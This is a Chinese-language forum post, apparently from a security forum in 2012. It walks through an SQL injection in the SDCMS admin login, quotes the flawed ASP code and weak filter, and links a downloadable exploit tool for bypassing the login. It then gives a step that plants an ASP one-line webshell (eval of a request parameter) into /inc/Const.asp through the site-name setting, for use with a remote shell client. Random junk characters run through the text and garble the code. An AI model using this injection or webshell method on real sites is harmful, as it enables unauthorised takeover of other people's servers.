作者:T00LS 鬼哥: c+ z5 g' J0 J2 m9 Z& N/ j
漏洞文件:后台目录/index.asp
3 U. s7 |- V0 _1 l- C
2 w0 ^% O! o" P' L# n, u6 CSub Check
4 G e6 U1 A: D3 p Dim username,password,code,getcode,Rs6 u7 Q* g4 ?0 ~" A5 G+ M
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub' M$ n, D; j$ X
username=FilterText(Trim(Request.Form("username")),1)" s( r! o& A1 {4 N. Z$ F4 ^# M
password=FilterText(Trim(Request.Form("password")),1)( _4 c2 o: S( p8 ~
code=Trim(Request.Form("yzm"))
. u0 x/ a% }3 A! x- w getcode=Session("SDCMSCode")
3 @! M7 F E: T; v IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
) h" U$ q& h$ ]7 x1 |( v IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied% N9 F" w! m- U- g7 j/ `4 g7 i
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
/ O2 O/ M! P7 b- F0 v: ] IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
0 R- h4 v0 M/ j) a2 C, E) i IF username="" or password="" Then; B x; P! @! T# `$ D
Echo "用户名或密码不能为空"ied
9 M) T) D7 \- M8 t6 n' r Else/ @1 ~1 }+ Y$ B* U' v) I' M, i, E: Z
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
?7 g+ D# d" d5 E! V' K4 v- c% Y IF Rs.Eof Then, ~4 |- I! N6 o: e) c/ h
AddLog username,GetIp,"登录失败",1
9 P3 P; w2 ?& _ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"% N- F( m. r; ~* D3 s* i: k" D& S0 K$ |+ G
Else
' {, N/ [5 z$ f: A- d Add_Cookies "sdcms_id",Rs(0)* O4 S* N+ S& x( O+ T, y
Add_Cookies "sdcms_name",username/ x- j1 F- P4 n# d" b- V
Add_Cookies "sdcms_pwd",Rs(2)/ n; q: A& ?0 P6 D9 q3 @" z
Add_Cookies "sdcms_admin",Rs(3)+ Q. V1 `3 O e u; r' K
Add_Cookies "sdcms_alllever",Rs(4)
& A4 K8 A' [0 s9 ?: y Add_Cookies "sdcms_infolever",Rs(5)& d) \$ D' y* _: Y, L/ N% N: m: P
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
: Q% }( r' Y! T2 n& w AddLog username,GetIp,"登录成功",1, a- I6 O6 W% X% ]
'自动删除30天前的Log记录
5 f( o: a }1 h IF Sdcms_DataType Then
# A. q7 V: o9 k1 h% d* Z" T5 { Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")+ x ^4 T* u' y6 v( g+ ?& h) q& c
Else. h$ e- D1 E* C8 [5 o
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
9 I& ?: T5 ?; ~# y* O End IF
" C/ }! x* h% M Go("sdcms_index.asp")7 ]' h0 g/ _6 Y) U# ?
End IF
$ d8 g! h; U: F' a y1 r Rs.Close
/ A' X; P4 B& e4 U; r( Z+ { Set Rs=Nothing
, p7 x }. u8 i4 Y8 }. g End IF% b. l( L! h- W% h, N
End Sub
" b9 G# L9 ]1 z' T% v( _, w# y3 g
8 J. p$ k! j2 A8 Z; u$ z’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
2 ~. a+ b! v: s) x+ I: G
/ J8 X5 c9 V4 GFunction FilterText(ByVal t0,ByVal t1)2 O7 Q/ G9 A# f, r) U8 w
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function# e" T$ `4 C% K- ]& L
t0=Trim(t0)1 h2 ]) x& N+ q) ?% p" L l0 n; N0 x
Select Case t1! D( L* i- v5 L7 ~$ I9 q3 S
Case "1". w* I9 H9 b+ @9 C
t0=Replace(t0,Chr(32),"")4 k3 O" C) M2 e0 U
t0=Replace(t0,Chr(13),"")
2 m3 c5 p0 U3 ~ _: k t0=Replace(t0,Chr(10)&Chr(10),"")
( G6 H) U. a2 }+ o4 L; I# V3 k6 c6 D t0=Replace(t0,Chr(10),"")* g4 L9 h- a5 h5 O# T! d
Case "2"- o" j$ Z. \( v
t0=Replace(t0,Chr(8),"")'回格 n) z/ }$ A7 P7 K4 R% V) K8 ]$ V
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
" |+ U. R2 U. o, E t0=Replace(t0,Chr(10),"")'换行
8 F: ?/ o+ h' ~ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)- m3 [4 p( G; n! ?" A) O
t0=Replace(t0,Chr(12),"")'换页1 ^- r3 \6 b" O+ I, ^2 c
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合1 v) U/ {6 b- } S- b5 z
t0=Replace(t0,Chr(22),"")
8 V' n. g& r6 c$ E+ ~( E( v7 U& L t0=Replace(t0,Chr(32),"")'空格 SPACE* k* W) M3 j- f x4 E& [- Z' v
t0=Replace(t0,Chr(33),"")'!: u. S. k$ u8 p2 D! ^
t0=Replace(t0,Chr(34),"")'"
/ Z# x R+ G7 J% E- L t0=Replace(t0,Chr(35),"")'#
0 ~9 w& h" z. P" I& l! x" H t0=Replace(t0,Chr(36),"")'$
6 y$ g; _8 i8 B# J3 U3 x t0=Replace(t0,Chr(37),"")'%) c, s" n6 O+ a3 h% G4 _. I+ F
t0=Replace(t0,Chr(38),"")'&
5 Z0 }1 k& U3 ~7 Z @8 Q t0=Replace(t0,Chr(39),"")''
1 N8 }3 ^( S' L, _7 W t0=Replace(t0,Chr(40),"")'(
+ h- Q0 g4 j1 e3 [& x% P t0=Replace(t0,Chr(41),"")')
2 C* A8 t% a: L1 |# w t0=Replace(t0,Chr(42),"")'*: R; \) L. k% [/ ]" z
t0=Replace(t0,Chr(43),"")'+
; t6 T' E. t1 r- p t0=Replace(t0,Chr(44),"")',6 r" ]+ z" I6 a0 e# C3 M! I u
t0=Replace(t0,Chr(45),"")'-
( O* |, C3 y6 v2 G t0=Replace(t0,Chr(46),"")'.7 ^' |: l/ n j5 z5 d' s- i
t0=Replace(t0,Chr(47),"")'/, E- u O5 O5 Q0 l. y. {
t0=Replace(t0,Chr(58),"")':1 i: q, j% L' z9 ~6 L c: y
t0=Replace(t0,Chr(59),"")';
( C( k5 V( D% I t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>, c* Z7 m, [; D1 Y6 u
t0=Replace(t0,Chr(63),"")'? L# j! w4 r/ W9 X
t0=Replace(t0,Chr(64),"")'@
* b+ Y7 Z7 s, |( ? G% m t0=Replace(t0,Chr(91),"")'\
& M5 j7 d* V- K t0=Replace(t0,Chr(92),"")'\3 l4 o1 K5 g9 E- w* R; X
t0=Replace(t0,Chr(93),"")']; d2 |$ R8 z9 V j* L4 W
t0=Replace(t0,Chr(94),"")'^# J5 J* f& n [
t0=Replace(t0,Chr(95),"")'_
0 a2 z" X% z4 E% R; j/ h) S t0=Replace(t0,Chr(96),"")'`
* d, G f) _8 W; Y t0=Replace(t0,Chr(123),"")'{9 J J! ^: h) y* a% V2 v# u& Q
t0=Replace(t0,Chr(124),"")'|: N- I% \/ Y2 x3 {5 E& E+ A: }: o+ j, H
t0=Replace(t0,Chr(125),"")'}# ?1 s) t5 a: M7 z" J8 Y2 z- g
t0=Replace(t0,Chr(126),"")'~6 Y/ o, ~3 l7 q7 E
Case Else+ A# E- K6 z- o( Z1 f
t0=Replace(t0, "&", "&")
2 L- a. R+ G3 A7 u t0=Replace(t0, "'", "'")
) f$ n8 P) D/ r3 R t0=Replace(t0, """", """)
: a, N9 v1 I$ }4 Q t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")% k( _1 L& z/ Z3 n; m
End Select
5 X# A: T) w1 L( ?; E IF Instr(Lcase(t0),"expression")>0 Then
2 ]2 r& q3 Z9 C& P# x t0=Replace(t0,"expression","e­xpression", 1, -1, 0)+ W4 W; r% M6 W6 m4 M7 \
End If
" v4 {% Y( X2 E4 s' }% N FilterText=t0
6 G5 a+ h% t( j5 |6 l" Z& JEnd Function) }: J: A* b) I) m- m1 v
7 m* G) u1 v0 k& V
看到没。直接参数是1 只过滤: P8 z! K0 {6 G; t0 h5 _
t0=Replace(t0,Chr(32)," ")2 Y- j: L& J# w2 L" O
t0=Replace(t0,Chr(13),"")% v9 Q" i+ i& s& ^0 N7 p
t0=Replace(t0,Chr(10)&Chr(10),"
) R' N8 o# V# K4 V( [: D; V")
8 i3 B1 w5 x1 {% b* M7 } t0=Replace(t0,Chr(10),"" M: a9 Y W) w. L2 A$ c) r
")7 U$ W! b" H; J5 n. {7 t" {
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!2 P$ a ?: X$ [5 V+ e0 B2 r
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP' h+ V' [* D b2 u) P9 M
' o: l( @6 F- G1 |' o5 i- L* h
测试:# F8 v, [- P9 f7 @% W( a7 B
( e; a# h- t" b) }, b' ?
5 z( B9 U! i' h5 Y现在输入工具上验证码,然后点OK
5 M! ^$ q( b5 i) D! A
9 j1 ], W/ o! R u5 A* u" @% a$ \& J" o+ k
看到我们直接进入后台管理界面了,呵呵!
6 I$ R1 C! ]2 X# N) q8 Q5 x
6 A1 U4 K$ b$ a k6 T+ H N8 g/ a$ E* P9 @' A8 a5 ]) V
9 `+ ?* r3 E5 Y. Y6 L* f8 e9 O
这样直接进入后台了。。。。
7 ~' W2 J4 u$ \0 I( J: O* o- Z7 }. a: n: p
6 A4 n9 s% J% l5 X* e
# S; ?0 [0 q) |& ]
SDCMS提权:- S e7 K% U( H% A( f8 a, S
1 ?3 ^# T v2 F- Y# r9 H
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?7 ]. u- G9 Y0 j2 X; m5 H7 _, S
" L! L( `. a2 x, I
2 T1 {0 z4 j( N; [* L. O, P( \
/ o6 ^5 a- k0 R# l, ?OK,现在用菜刀连接下!
% F) a2 ]- ^ o9 C& h. P# G1 O3 b* T* m* K1 @7 ~" Y# K( M4 a5 c% [
6 F9 Z0 p. h3 ~: s' h n
0 p O6 L; l" U `7 T& p. |" B- D e - \/ E% }; e1 p$ W+ e
1 ?( A8 Y! Q/ T# d |
发表于 2012-11-9 20:57:02
收藏
支持
反对